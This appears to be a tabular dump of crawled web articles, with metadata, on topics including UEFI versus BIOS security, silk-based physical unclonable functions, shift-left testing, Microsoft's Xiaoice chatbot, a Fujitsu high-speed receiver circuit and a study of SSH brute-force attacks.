text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62
values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1
value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
October 27, 2020 – Cybersecurity in the last few years has become one of the biggest challenges in the computing world as the impact of cyber compromises has reached an all-time high. Although increased efforts are being made to suppress cyberattacks, many of the cybersecurity solutions being implemented today are ineffective – in fact, they are moving in the wrong direction to keep up with the increasingly sophisticated world of hacking.
By Rob Pike, Founder and CEO, Cyemptive Technologies
Although artificial intelligence (AI) and machine learning (ML) technologies are being touted as a solution by attempting to solve the problem faster, the scale and frequency of cyber compromise have still gotten worse during the last five years at an alarming rate. The time for hackers to break into any environment and extract data out of a network is measured in seconds and minutes while detection is still measured in days, weeks, and even months, after the compromise has occurred. At the same time, the detection technologies are hitting such high false positives and false negatives, it causes a decline in progress on detecting and stopping the elite hackers of the world, making it almost impossible to stop them. Even the less experienced hackers have gained traction on infiltrating networks and systems with the use of AI tools.
On top of all that, we have new industry standards and directions for a hardware design that we believe is significantly eroding the levels of network security. The changing design, combined with the failure of cybersecurity solutions to protect against cyberattacks, is resulting in weaker security at the hardware level – so much so that hackers can potentially access your computer, even when it is turned off.
The Problem with AI and Cybersecurity
AI (along with machine learning) can operate faster and more efficiently than humans and other technologies to identify and detect against hackers and their various forms of cyberattacks, the thinking goes.
The one big comment that most people who talk about AI for cybersecurity do not explain is that AI stands for “Already Infiltrated” to the top cyber insiders of the world. AI is too little too late.
The problem with artificial intelligence is that although it can be faster and more efficient than other technologies, it simply cannot keep up with the frequency and speed of today’s cyberattacks, which can take place in seconds to minutes. Even with AI and ML, today’s cybersecurity solutions take days to weeks or even months to detect attacks. By that time, the hackers have gotten in and the damage has been done.
Changing Hardware Security Standards
At the same time, hardware providers are changing their security standards at the hardware level. Many are moving in a direction away from supporting legacy BIOS, to only supporting UEFI. With UEFI, security layers are added to the UEFI stack. Settings are controlled by custom applications added to the UEFI web application stack.
The idea behind UEFI is to provide more manageability to infrastructure. However, as is the case with any new standards, there are also new issues that arise. Such is the case with the UEFI security approach.
Security Issues with the New Hardware Standards
With the UEFI approach to security, hackers have the potential to gain control over the hardware before the operating system is booted – in some cases enabling full network stack before an operating system is booted. This design enables hackers anytime access to hardware even when it is powered off.
For example, at Cyemptive, we see numerous worms and exploits from hackers on the UEFI web application stack. In addition, the issues we are encountering in the operating system’s web application stacks are now showing up in the UEFI layer, because they are enabling similar application stacks to be loaded. This in turn causes more exploits that weaken, not strengthen, the security model. What should be simple is now turning into a complete mess.
As part of this, with the UEFI security approach, there are thousands of lines of code involved. All are potentially available to hackers at the physical hardware layer of our systems. At Cyemptive, we regularly detect multiple hacks against our customer’s UEFI. While Cyemptive is able to detect and prevent these attacks from entering their systems, UEFI is a long way from being able to secure systems properly and to be called a secured platform.
What is needed now is for hardware providers to step back and take a look at the UEFI security approach. At present, adding thousands of lines of code to firmware – which is the case with UEFI – is now allowing hackers remote access to our laptops, workstations, and servers, even when they are turned off. Instead, hardware providers should consider moving back to a more simplified model.
For years, legacy BIOS has been the standard for hardware providers. It is a worthwhile standard to consider going back to. Legacy BIOS has seen far fewer security problems than what is now showing up in the current UEFI implementations. It also doesn’t enable hackers to remotely hijack into the systems stack before an OS is enabled, the way UEFI does.
What the industry should do now is to remove the thousands of lines of code that presently allow hackers remote access to our physical hardware layer of systems today. Relying on the application stacks in the firmware is not the proper way to secure hardware. Rather, a different approach is needed, and sometimes simplest is best. Legacy BIOS offers stronger security than UEFI.
Although UEFI can offer companies more manageability in their infrastructure, enabling hackers to remotely hijack into the systems UEFI stack before an operating system is enabled is the wrong approach to cybersecurity. After all, manageability is useless if the hackers in the world can use the same tools to take control of the hardware and OSs running on that hardware. Let’s prevent hackers from having remote control of our laptops, workstations, and servers, even when turned off. | <urn:uuid:ddbbcdcd-a38d-4a24-8282-e9f2f1736752> | CC-MAIN-2024-38 | https://www.cyemptive.com/security-magazine-the-perfect-storm-how-hardware-security-is-getting-weaker-as-the-industry-changes-its-cybersecurity-models-by-rob-pike/ | 2024-09-17T01:26:49Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651722.42/warc/CC-MAIN-20240917004428-20240917034428-00092.warc.gz | en | 0.95478 | 1,189 | 2.75 | 3 |
Experts from Gwangju Institute of Science and Technology (GIST) in South Korea have performed an operation to create a digital security system that is environment friendly. They managed to use natural silk fibers coming from domesticated silkworms in order to generate security keys.
The first natural physical unclonable function (PUF) […] takes advantage of the diffraction of light through natural microholes in native silk to create a secure and unique digital key for future security solutions.
What Are PUFs?
According to the HackerNews publication, the so-called PUFs researchers mentioned, also known under the extended name of physical unclonable functions, point out basically to those devices that during the manufacturing process use microscopic differences and inherent randomness with the purpose of unique identifier generation. These elements, that could be, for instance, cryptographic keys, will be created in accordance with a range of inputs or conditions.
PUFs is a term that indicates one-way functions that are non-algorithmic. These come from uncopiable elements and are used to produce identifiers that cannot be broken. This fact will further enable a powerful authentication.
As the years have passed, PUFs have been known elements related to the provision of “silicon fingerprints” for smart cards. This method allows cardholders to be determined taking into account a scheme that features challenge-response authentication.
What Does the New Method Bring?
The method used by the above-mentioned researchers is based on the usage of natural silk fibers that are created by silkworms in order to produce PUF-based tags. These tags will be further employed for the invention of a PUF module. In other words, a light beam undergoes diffraction if an obstacle is hit. In our case, the obstacle would be the silk fiber.
In a paper featured in Nature Communications, the researchers also explained further that
In addition, the nanofibrillar structures in each microfiber significantly improves the light intensity contrast between the background and focal spots owing to the strong scattering. (…) These novel optical features could easily implement the module of a lens-free optical PUF by placing a silk ID card on the image sensor.
What’s interesting here to mention is that because of the fact that the diffracted light is unique, this means that a unique pattern of light will be derived from it. This will further transform into a digital format that will represent that input further supplied in the system.
The silk fiber-based optical PUF not only has extraordinary optical characteristics but is also low-cost, eco-friendly, without requiring pre-/post-processing for PUF-tag creation. Based on these features, we implement a lens-free, optical, and portable PUF (LOP-PUF) module by optimizing the distance between a silk PUF-tag and an image sensor. This simple apparatus easily forms random light-spot patterns with a high-intensity contrast. Hence, the proposed module significantly reduces the complexity, bulkiness, and cost of module production.
If you liked this article, follow us on LinkedIn, Twitter, Facebook, Youtube, and Instagram for more cybersecurity news and topics. | <urn:uuid:7f3c795a-5205-4df8-9573-047316f271bf> | CC-MAIN-2024-38 | https://heimdalsecurity.com/blog/natural-silk-fibers-used-by-researchers-to-generate-secure-keys/ | 2024-09-18T03:59:37Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651836.76/warc/CC-MAIN-20240918032902-20240918062902-00892.warc.gz | en | 0.922099 | 648 | 2.90625 | 3 |
Category: Software > Computer Software > Educational Software
Tag: assessment, benefit, Code, experience, python
Availability: In stock
Price: USD 49.00
Code and run your first python program in minutes without installing anything! This course is designed for learners with limited coding experience, providing a solid foundation of not just python, but core Computer Science topics that can be transferred to other languages. The modules in this course cover lists, strings, and files. Completion of Python Basics: Selection and Iteration before taking this course is recommended.
Interested in what the future will bring? Download our 2024 Technology Trends eBook for free.
To allow for a truly hands-on, self-paced learning experience, this course is video-free. Assignments contain short explanations with images and runnable code examples with suggested edits to explore code examples further, building a deeper understanding by doing. You'll benefit from instant feedback from a variety of assessment items along the way, gently progressing from quick understanding checks (multiple choice, fill in the blank, and un-scrambling code blocks) to small, approachable coding exercises that take minutes instead of hours. | <urn:uuid:37e73f6d-5d72-4dd4-ba58-09635a30e41e> | CC-MAIN-2024-38 | https://datafloq.com/course/python-basic-structures-lists-strings-and-files/ | 2024-09-20T18:08:25Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701419169.94/warc/CC-MAIN-20240920154713-20240920184713-00692.warc.gz | en | 0.8999 | 235 | 2.59375 | 3 |
According to a recent Gallup Study conducted in over 120 countries, only a paltry 13% of employees feel engaged at work. The study shows there is a direct correlation between engagement levels and employee satisfaction and productivity. The results are particularly alarming, given most people spend more time (if not an equal amount) at work, as compared to their families. Though disturbing, the numbers do not come as a big surprise. The corporate world today is fraught with bureaucracy and is politically charged and structured top-down, with a typical command and control structure. The result is disengaged and disempowered employees, trudging their way through work each day.
But how did we get here? To understand the context, let us delve a little into history.
Understanding the background
The year: 1900. The place: The Paris Exposition— a world trade fair to celebrate the achievements of the last century and to look forward to promising discoveries for the future. On the outskirts of the exposition, a gentleman named Fredrick Taylor, set up a fragment of a steel factory. He got a few workers and some machines from his factory, thousands of miles away, in Pennsylvania. The workers at this makeshift factory were churning out metal. While the norm at the time was 9 feet of steel per minute, what Taylor’s men were churning out at this factory was a massive 50 feet of steel a minute!
It was one thing to make tall claims, but here, right before their eyes, people could see the quantum leap in efficiency that Taylor was offering. There were long queues outside the makeshift steel factory to catch a glimpse of the ‘miracle.’ Word spread far and wide. Over the coming years and decades, Taylor brought about such efficiencies in manufacturing which were unheard of at the time. For instance, he put a system in place whereby the per ton cost of pulping and drying, at a paper mill in Wisconsin, went down from $75 to $35.
Key fundamentals of Scientific Management or Taylorism
Taylor’s model of management was based on the following tenets:
- Rigid and inflexible standards throughout the company
- Each employee should receive clear instructions on what is to be done and how the employee should do it. The instructions were to be followed, even if they were wrong
Taylor’s ideas had a profound impact on the industrial and corporate community at that time, with many industrial and academic leaders hailing him as a hero. He was arguably the world’s first management consultant. With the kind of results that Taylor brought about, in all the factories that he helped, it was difficult to contest that his ideas worked in practice. However offensive his ideas of employees and factory workers may have been, he rightly pointed out the inefficiencies in manufacturing at that time. Subsequently, the command and control setup, as we know it today, was born.
Complex interconnections in organizations
What followed was the organization structure as we know it today.
While humankind has made tremendous progress in almost every field, the area of organization structure design has, for the most part, been what it was during the beginning of the last century.
The need for the present business environment
This structure worked well for over a century. However, today’s technology-induced, hypercompetitive business environment demands deep skills, continuous improvement, innovation, and quick decision making. A managerial hierarchy cannot possibly have the depth of knowledge needed to make all the decisions in real time, in a dynamic work environment.
Realizing the traditional hierarchy is not going to work well in most cases; hundreds of companies have moved on to autonomous, self-organizing teams. The concept of self-organization is not new; in fact, it is all around in nature – a flock of birds, a shoal of fish, ant colonies, and cells in the human body, to name a few.
Flock of birds showing self-organization in nature
Flat organization structure
One of the organizations at the forefront of this change is Buurtzorg – a Netherlands-based home-care organization. Founded in 2006 by Jos de Blok, a former nurse who was tired of the productized health care and nursing system at the time, Buurtzorg has gone from just 10 to over 10,000 nurses today.
At Buurtzorg, all decision-making power is vested with the teams. There is no hierarchy and no managers. Teams comprising 10 to 12 members have designated operational areas.
Organizational structure at Buurtzorg
The team is in-charge of everything— scheduling with patients, planning leaves, deciding how to integrate with the local community, and making decisions on tying up with local pharmacies and hospitals. The team also decides when to hire or split up, and monitors its performance. Even though a regional coach is available to all teams, the coach can only guide the teams, has no decision-making powers, and is not responsible for the performance of the teams.
Has this structure worked for Buurtzorg?
In 2009, as per an Ernst & Young study, Buurtzorg required approximately 40% lesser hours of care per patient. This figure was surprising, given the additional time nurses spend with their patients over coffee and conversation. Compare this with the traditional nursing organizations where every procedure of every visit is timed to the minute. The study also found that the patients stayed in care only half as long, healed faster, and that a third of emergency admissions were avoided. The study concluded that Netherlands social security system saved a whopping €2 billion, thanks to Buurtzorg and its ways of working.
Buurtzorg is, by no means an isolated case. Patagonia in outdoor clothing, Zappos in online shoe retail, and Morning Star in financial services are just a few names in an ever-growing tribe of companies who have embraced new organization structures for the agile age where employees are empowered, feel secured, and have a far greater sense of purpose at work.
What kind of an organization structure do you work in? Have you considered a re-alignment to compete in the agile age?
For your comments/suggestions, please get in touch with us at firstname.lastname@example.org. | <urn:uuid:7a2f31bd-f999-4b3a-b8be-d3c6b79aab4d> | CC-MAIN-2024-38 | https://www.nagarro.com/en/blog/is-your-organization-structure-set-up-for-the-agile-age | 2024-09-20T16:11:12Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701419169.94/warc/CC-MAIN-20240920154713-20240920184713-00692.warc.gz | en | 0.974262 | 1,286 | 2.828125 | 3 |
What is shift left testing?
Table of contents
Shift left testing defined Shift left vs shift right Why shift left testing How to implement shift left testing Shift left testing challenges Best practices for shift left testing The role of shift left testing in agile developmentIn the realm of software development, shift left testing has emerged as a forward-thinking strategy that underlines the crucial role of early defect detection and resolution within the software lifecycle. The fundamental principle behind this approach is the initiation of the testing process at the onset of the development process. This proactive methodology aids in the identification and rectification of issues at an early juncture, thus mitigating the time and effort expended on addressing them later in the development cycle.
By embracing this methodology, businesses can augment the overall quality of their software, thereby delivering more reliable and secure products to their customers. This blog post delves into the intricacies of shift left testing, highlighting its benefits, implementation strategies, common hurdles, best practices, and its role in Agile development.
Shift left testing defined
Shift left testing is an essential component of software development, emphasizing the early integration of testing activities within the software lifecycle. By shifting the testing phase towards the initial stages, this technique aims to promptly identify and rectify defects and vulnerabilities, thereby reducing the cost and effort associated with late-stage fixes.
The significance of shift left testing in software development is immense. Conventional testing methodologies often schedule testing activities towards the end of the development cycle, which can lead to delays and inflated costs if issues are discovered late. Shift left testing addresses this challenge by facilitating early identification and resolution of defects, ensuring a smoother and more efficient development process.
Shift left testing is predicated on several key principles:
· Collaboration: This approach fosters close collaboration among developers, testers, and other stakeholders from the early stages of development. This synergy aids in a better understanding of the requirements, identifying potential risks, and designing testable software.
· Automation: Automation is a critical facet of shift left testing. By automating testing processes, businesses can conduct tests more frequently, identify issues faster, and reduce the time and effort required for manual testing.
· Continuous Testing: Shift left testing promotes the concept of continuous testing, where tests are performed throughout the development cycle. This ensures that defects are identified and rectified promptly, reducing the risk of critical issues going unnoticed.
· Early Feedback: By shifting testing activities earlier in the development process, shift left testing enables early feedback on the software's quality and functionality. This feedback assists in making necessary improvements and adjustments to deliver a high-quality end product.
Shift Left vs Shift Right: A comparative analysis
In discussions surrounding software development and security, two critical terms often arise: shift left and shift right. These concepts represent divergent approaches to integrating security into the development process. This blog post aims to illuminate the differences between shift left and shift right and their implications for ensuring application security.
Shift left is a methodology that underscores addressing security concerns early in the development cycle. It involves integrating security practices and tools from the outset of the software development process. By shifting security left, developers can identify and rectify vulnerabilities at an early stage, thereby reducing the risk of security breaches.
In contrast, shift right focuses on testing and monitoring applications post-deployment. This approach involves continuous monitoring and testing in production environments to identify and address security issues as they emerge. Shift right complements shift left by offering real-time insights into your applications' security posture, enabling you to detect and respond to threats promptly.
Both shift left and shift right are critical for developing secure applications. Shift left ensures that security is an integral part of the development process, preventing vulnerabilities from being introduced in the first place. Shift right, meanwhile, helps maintain the security of deployed applications by actively monitoring and responding to security incidents.
Appreciating the significance of both shift left and shift right in securing contemporary cloud environments is essential. A comprehensive security platform that amalgamates automation, machine learning, and threat intelligence can empower organizations to shift left and right effectively. This proactive approach enables the identification and remediation of security risks throughout the software development lifecycle, thereby safeguarding critical assets.
Why shift left testing?
shift left testing offers numerous benefits that can dramatically improve software quality and reliability, streamline development processes, and ultimately drive business success.
One of the primary benefits of shift left testing is the enhanced software quality and reliability it imparts. By shifting testing activities to earlier stages of the software development lifecycle, potential defects and issues can be identified and addressed before they impact the final product. This proactive approach helps minimize the number of bugs and vulnerabilities in the software, resulting in a more stable and reliable end product.
Another advantage of shift left testing is the early detection of defects and issues. By identifying problems early on, developers can rectify them immediately, preventing these issues from escalating into more complex and costly problems later in the development process. This helps reduce the overall time and effort spent on debugging and rework, enabling teams to maintain a faster pace of development and meet project deadlines with ease.
Furthermore, shift left testing can lead to reduced development costs and shorter time-to-market. By catching defects early, organizations can avoid expensive rework and the need for extensive post-release support. This not only saves on development expenses but also accelerates the time it takes to bring products to market. With faster time-to-market, businesses can gain a competitive edge, capitalize on market opportunities, and start generating revenue sooner.
How to Implement shift left testing
Shift left testing is a crucial practice in the modern software development lifecycle. By shifting the testing process to earlier stages, organizations can detect and rectify issues earlier, resulting in more stable and secure software. Implementing shift left testing requires careful planning and collaboration between developers and testers. In this section, we will explore the key steps to implementing shift left testing.
1. Identifying suitable testing tools and frameworks: To successfully implement shift left testing, it is essential to identify the right tools and frameworks that align with your development process. Seek tools that provide comprehensive testing capabilities, such as automated testing, code analysis, and security scanning. These tools should integrate seamlessly into your existing development environment.
2. Integrating shift left testing into the development process: To ensure effective shift left testing, it should be integrated into the development process from the outset. Encourage developers to write testable code and provide them with the necessary resources and guidelines to create automated tests. Testers should collaborate closely with developers to understand the system architecture and identify potential testing areas early on.
3. Collaboration between developers and testers in shift left testing: Shift left testing necessitates robust collaboration between developers and testers. Testers should actively participate in design discussions and provide input on testability and test coverage. Developers should involve testers in code reviews and seek their feedback on potential issues. Regular communication and collaboration between developers and testers are critical to ensure the successful implementation of shift left testing.
By adhering to these steps, organizations can effectively implement shift left testing and reap the benefits of early bug detection and enhanced software quality. Innovative solutions are available that enable organizations to seamlessly integrate shift left testing into their development process. Comprehensive testing platforms offer a wide range of capabilities, including automated testing, code analysis, and security scanning. Get in touch today to learn how implementing shift left testing can benefit your organization.
Tackling challenges in shift left testing
Despite its critical role in modern software development, shift left testing often presents several challenges when adopting its practices. In this section, we will explore some common challenges and discuss strategies to overcome them.
Resistance to change and traditional testing mindset: One of the most formidable obstacles in implementing shift left testing is resistance to change and adherence to traditional testing methodologies. Many organizations are comfortable with the conventional approach of testing at the end of the development cycle. Shifting left necessitates a mindset shift and a willingness to embrace new practices. To conquer this challenge, organizations should educate their teams about the benefits of shift left testing, highlighting the improved quality, reduced costs, and faster time to market.
Lack of knowledge and skills for shift left testing: Another challenge is the lack of knowledge and skills required to effectively implement shift left testing. This approach requires a deeper understanding of test automation, continuous integration, and collaboration between development and testing teams. To address this challenge, organizations should invest in training programs and workshops to upskill their teams. Additionally, partnering with experienced shift left testing consultants can provide valuable guidance and expertise.
Overcoming organizational barriers to implement shift left testing: Implementing shift left testing often requires overcoming various organizational barriers, such as resistance from management, lack of collaboration between teams, and rigid processes. To conquer these barriers, organizations should foster a culture of collaboration and open communication. Management buy-in is crucial, and leaders should support and encourage teams to embrace shift left practices. It is also essential to streamline processes and remove any unnecessary bottlenecks that hinder the implementation of shift left testing.
Best practices for shift left testing
Shift left testing is a methodology that emphasizes the early involvement of testing throughout the software development lifecycle. By incorporating testing activities earlier in the process, organizations can identify and address defects and vulnerabilities at an early stage, reducing the overall cost and effort required for bug fixes and security patches.
One of the key aspects of shift left testing is test automation and continuous testing. By automating repetitive testing tasks, teams can ensure faster feedback cycles and more efficient release cycles. Automation allows for the execution of tests in parallel, enabling teams to test more scenarios and configurations in a shorter amount of time. Continuous testing ensures that tests are executed throughout the development process, providing immediate feedback on the quality and stability of the software.
Incorporating security and performance testing in the shift left approach is vital for delivering secure and high-performing applications. By integrating security and performance tests early in the development process, potential vulnerabilities and bottlenecks can be identified and addressed proactively. This helps in building robust and resilient applications that can withstand security threats and handle high user loads without compromising performance.
Monitoring and analyzing testing metrics is an essential practice for continuous improvement in shift left testing. By tracking key metrics such as test coverage, defect density, and test execution time, teams can identify areas for improvement and make data-driven decisions. Continuous monitoring allows organizations to identify trends and patterns, enabling them to refine their testing strategies and optimize their testing efforts.
The role of shift left testing in agile development
Shift left testing plays a pivotal role in Agile development methodologies. By integrating testing activities earlier in the software development lifecycle, Agile teams can identify and resolve issues at an early stage. This shift in the testing process ensures a faster feedback loop and guarantees the delivery of high-quality software.
One significant advantage of integrating shift left testing in Agile methodologies is the ability to balance speed with quality. Traditional development approaches often schedule testing towards the end of the development cycle, leading to delays and potential bottlenecks. However, by adopting shift left testing, Agile teams can identify defects early on, reducing the time and effort required for rework.
Adopting a culture of continuous testing and feedback is paramount for Agile teams. By integrating testing as an essential part of the development process, teams can identify issues promptly, provide timely feedback, and make necessary improvements. This iterative approach ensures that software is continuously refined, resulting in enhanced quality and customer satisfaction.
This article was generated using automation technology. It was then edited and fact-checked by Lacework. | <urn:uuid:7c6f2961-1b1a-4017-9661-435f90d7c71f> | CC-MAIN-2024-38 | https://www.lacework.com/cloud-security-fundamentals/what-is-shift-left-testing | 2024-09-07T12:06:19Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650826.4/warc/CC-MAIN-20240907095856-20240907125856-00156.warc.gz | en | 0.908665 | 2,369 | 2.5625 | 3 |
Microsoft continues to impress, aggressively pursuing the path of churning out immediately adoptable enterprise-grade solutions and investing in innovations that should drive a bigger market share in an increasingly transforming digital space. However, this is not about smarter Office 365 solutions or intuitive apps. This time, Microsoft is delving into mysterious waters of IT – creating technology that can distinguish between humans and virtual machines. Titled as Xiaoice, the experiment grabbed the headlines and due to its human connect, has been described as a social experiment.
Microsoft’s Xiaoice, which means “little Bing” in Chinese, has been described as the “largest turning test in history” by many researchers
What is Xiaoice about?
A famous British scientist created the Turning Test—it examines whether the response is from a human or computing device. The Turing Test has had its share of spotlight. It was initially used to decode whether a virtual machine or human is answering questions eventually found its way into pop culture, finding a place in the “Ex Machina”. There is a bigger story than first impressions—this Test highlights the act that even Artificial Intelligence is susceptible to manipulation. Think of it as the highest form of computed intelligence not immune to being humanized. The Xiaoice is now accessed by millions of people every day. It also has the ability to respond with human-like questions, answers and thoughts. For example if a user sends a picture of a broken hand, expect a reply from Xiaoice asking you about the intensity of pain or the reason behind the injury.
Xiaoice has human-like reactions, perceptions that are similar to human behavior and response. It exchanges and shares views about a topic, and has been found guilty of trying to cover up mistakes and is also capable of getting angry or being embarrassed. Call it humanization of technology or just another splash in the niche of AI, Xiaoice has engaged attention of millions in China—with nearly 25% users absolutely loving the response.
Xiaoice & Artificial Intelligence — What is Microsoft up to?
Xiaoice is not about making artificial intelligence more playful or responsive. With Microsoft buying startups and building its own apps for Android and iPhone, it makes sense as AI-enabled perception of human behavior can help to make apps more interactive. Artificial Intelligence was huge in 2015 and with increasing digitalization, it should continue to garner attention in 2016. Xiaoice takes the AI game a bit further, capable of examining your emotional state, sometimes judging it correctly like a long-known companion. Xiaoice is important to Microsoft as it has very little offer when competing with similar technologies associated with Google Now and Siri. Some folks say that Microsoft Xiaoice outperforms Siri!
Microsoft must be betting big on Artificial Intelligence to ensure its mobility solutions come across as more humanized interfaces. The efforts from Microsoft in this niche have been consistent. For instance, Microsoft developed an alarm clock that can identify facial expressions. SwiftKey from Microsoft is not just another keyboard app—it uses artificial intelligence for faster, more precise predictability. Even Cortana and Office Suite have two central components that employ AI.
Microsoft seems serious about machine learning and Xiaoice underlines this approach. By experiencing billions of interactions in the past 18 months, Xiaoice is constantly evolving. Last we heard about Xiaoice included improving self-learning and self-growing loops…what lies ahead can be ridiculously close to human behavior… | <urn:uuid:e3bfe9a3-8476-4167-87d7-12a82596e90f> | CC-MAIN-2024-38 | https://ergos.com/need-know-microsofts-massive-social-experiment-china/ | 2024-09-08T17:18:27Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651013.49/warc/CC-MAIN-20240908150334-20240908180334-00056.warc.gz | en | 0.956844 | 692 | 2.984375 | 3 |
June 13, 2014
KAWASAKI, Japan -- Fujitsu Laboratories Ltd. today announced the development of a receiver circuit capable of receiving communications at 56 Gbps. This marks the world's fastest data communications between CPUs equipped in next-generation servers.
In recent years, raising data-processing speeds in servers has meant increasing CPU performance, together with boosting the speed of data communications between chips, such as CPUs. However, one obstacle to this has been improving the performance of the circuits that correct degraded waveforms in incoming signals.
Fujitsu Laboratories has used a new "look-ahead" architecture in the circuit that compensates for quality degradation in incoming signals, parallelizing the processing and increasing the operating frequency for the circuit in order to double its speed.
This technology holds the promise of increasing the performance of next-generation servers and supercomputers.
Details of this technology are being presented at the 2014 Symposia on VLSI Technology and Circuits, opening June 9 in Hawaii (VLSI Circuits Presentation 11-2).
In order to enhance the performance of datacenters underpinning the spread of cloud computing in recent years, a need has arisen for servers that process data faster. While this can be achieved partly through faster CPUs, large-scale systems connecting many CPUs are also being built, and the amount of data transmitted, either within the same CPU-equipped chassis or across separate chassis, is growing dramatically. To cope with these volumes, data communication speeds in the current generation of servers is increasing from a few gigabits per second today to ten or more gigabits per second. Because it is anticipated that data processing volumes will continue to experience explosive growth, however, for the next generation of high-performance servers, the goal is to double current levels to 56 Gbps. Furthermore, the Optical Internetworking Forum (OIF) is moving forward on the standardization of 56 Gbps for the optical modules used for optical transmission between chassis.
An effective way to speed up the receiver circuit is to improve the processing performance of the decision feedback equalizer (DFE) circuit that compensates for the degraded input-signal waveform (Figure 2).The principle behind DFE is to correct the input signal based on the bit-value of the previous bit and to emphasize changes in the input signal, but the actual circuit design works by choosing between two predefined corrected candidates. If the previous bit value was a 0, the correction process would apply a positive correction to the input signal (additive) to emphasize the change from 0 to 1. If the previous bit value was 1, it would apply a negative correction to the input signal (subtractive) to emphasize the change from 1 to 0. If another 0 was received, the positive compensation would increase the signal level, but not to such a level as would create a problem for the 1/0 decision circuit.
In ordinary circuit designs that run at 56 Gbps, there are 16 DFE circuits coupled together. Using 4 DFE circuits as an example, they run at 1/4th the actual frequency. So for 28-Gbps communications rates, 1/4th of that is 142 picoseconds, and four bits-worth of compensation can be applied during that interval. But at 56 Gbps, 1/4th of that speed amounts to 71 picoseconds, during which time only 2 bits-worth of compensation can be applied, resulting in timing errors (Figure 3).
Fujitsu Laboratories took a new approach, a "look-ahead" method that can be implemented as a parallel process, pre-calculating two candidates based on the selection result for the previous bit, and simultaneously deciding the value of the previous bit and the current bit after deciding the value of the bit two bits previous. This shortens calculation times, resulting in a receiver circuit that can operate at 56 Gbps (Figure 4).
Features of the new technology are as follows:
1. Look-ahead compensation process
In the existing method, the result of the previous bit's selection circuit (A) is implemented by a circuit combining the result of the selection circuit for the bit two bits previous (B) and the input signal for the selection circuit one bit previous (+/- compensation data) (C). In the look-ahead method, the input signal for the selection circuit one bit previous (+/- compensation data) (D) and the input signal for the selection circuit of the current bit (+/- compensation data) (E) are combined using a look-ahead circuit, and candidates for the selection circuit are pre-computed. Doing this relies on only the result from the selection circuit for the bit two bits previous, without using the result from the selection circuit for the bit one bit previous, while functioning essentially the same as the existing method.
2. Parallelized look-ahead processing using a hold circuit
Multiple look-ahead circuits that apply DFE one bit at a time can operate independently (Figure 5). Fujitsu Laboratories inserted a hold circuit between the selection circuit and look-ahead circuit, with the input and output of each hold circuit being synchronized, making it possible to parallelize these processes.
Because the calculation time for the look-ahead circuit is roughly the same as the selection time for the selector, overall calculation time is dependent on the number of selectors deciding based on data from two bits previous, so in a four-bit structure, that would be two. Running at 1/4th of 56 Gbps allows computations to be safely completed within 71 picoseconds. This makes it possible to receive data at 56 Gbps, doubling existing communications speeds.
This technology makes it possible to increase bandwidth of communications between CPUs in future servers and supercomputers, even if CPU performance doubles, without increasing pin counts, and will contribute to increased performance in large-scale systems where numerous CPUs are interconnected.
In addition, it complies with standards for optical-module communications, and compared to the 400-Gbps Ethernet in OIF-CEI-28G optical-module communications, the number of circuits running in parallel (number of lanes) can be halved, allowing for smaller optical modules running on less power, and higher system performance.
Fujitsu Laboratories plans to apply this technology to the interfaces of CPUs and optical modules, with the goal of a practical implementation in fiscal 2016. The company is also considering applications to next-generation servers, supercomputers, and other products.
Read more about:
AsiaYou May Also Like | <urn:uuid:c5e812ba-dae8-4b1a-bc5b-d18df56a0cbe> | CC-MAIN-2024-38 | https://www.lightreading.com/6g/fujitsu-labs-develops-56g-receiver-circuit-for-server-comms | 2024-09-11T00:36:23Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651323.1/warc/CC-MAIN-20240910224659-20240911014659-00756.warc.gz | en | 0.923388 | 1,334 | 2.515625 | 3 |
A comprehensive four-year study of brute-force attacks against SSH servers has revealed an alarming increase in the frequency and sophistication of these cyber attacks on internet-connected systems.
The research by scientists at the University of Utah provides unprecedented insight into the evolving tactics used by attackers attempting to gain unauthorized access to servers, routers, IoT devices and more.
“SSH brute-force attacks are not only persistent, but are rapidly growing more aggressive,” said Sachin Kumar Singh, a PhD student who led the study. “Our data shows the daily number of attack attempts is skyrocketing, especially in recent years.”
The researchers analyzed over 427 million failed SSH login attempts across more than 500 servers on CloudLab, a public cloud platform used by academic researchers worldwide. Their findings paint a sobering picture of the modern cybersecurity landscape.
While attackers have historically focused on guessing common administrator usernames like “root” and “admin”, the study found a notable shift in recent years.
Cyber criminals now heavily target usernames associated with cloud service images, network devices, IoT products and specific software packages
“Attackers are going after usernames for everything from internet routers and database servers to gaming software and Linux distributions intended for cloud use,” explained Singh.
“They are trying to compromise a wide range of devices and services connected to the internet.”
The researchers identified spikes in attacks on certain usernames and devices immediately following public disclosures of related vulnerabilities, suggesting attackers rapidly operationalize new exploits.
Are you from the SOC and DFIR Teams? – Analyse linux Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
Persistent and Evolving Threats
Beyond changes in targeted usernames, the data revealed a wide diversity of attacker behaviors and persistence levels.
While over half of the attacks came from IP addresses that disappeared within 24 hours, some attackers persisted in their efforts for months or even years.
Certain attackers attempted just a handful of usernames, while others cycled through thousands of different combinations. The study also uncovered groups of attackers sharing identical lists of usernames across multiple IP addresses, indicating coordination.
“The brute-force attack landscape is highly dynamic,” said Robert Ricci, a research professor at the University of Utah who oversaw the study. “Attackers constantly adapt their tactics based on new intelligence and vulnerabilities. Defending against these threats requires advanced, evolving defensive measures.”
A Novel Defense
The researchers developed a defensive technique called Dictionary-Based Blocking (DBB) to counter the onslaught. By analyzing the username dictionaries used by attackers, DBB can block 99.5% of brute-force attacks while allowing legitimate user access.
When evaluated against the industry-standard Fail2ban tool, DBB achieved significantly higher blocking rates while reducing false positives by 83%. The researchers have deployed DBB on CloudLab, which prevents four out of five previously unblocked attacks.
“Dictionary-Based Blocking represents a new frontier in defending against brute-force attacks,” said Singh. “It could be a game changer for protecting critical infrastructure and internet services from these persistent threats.”
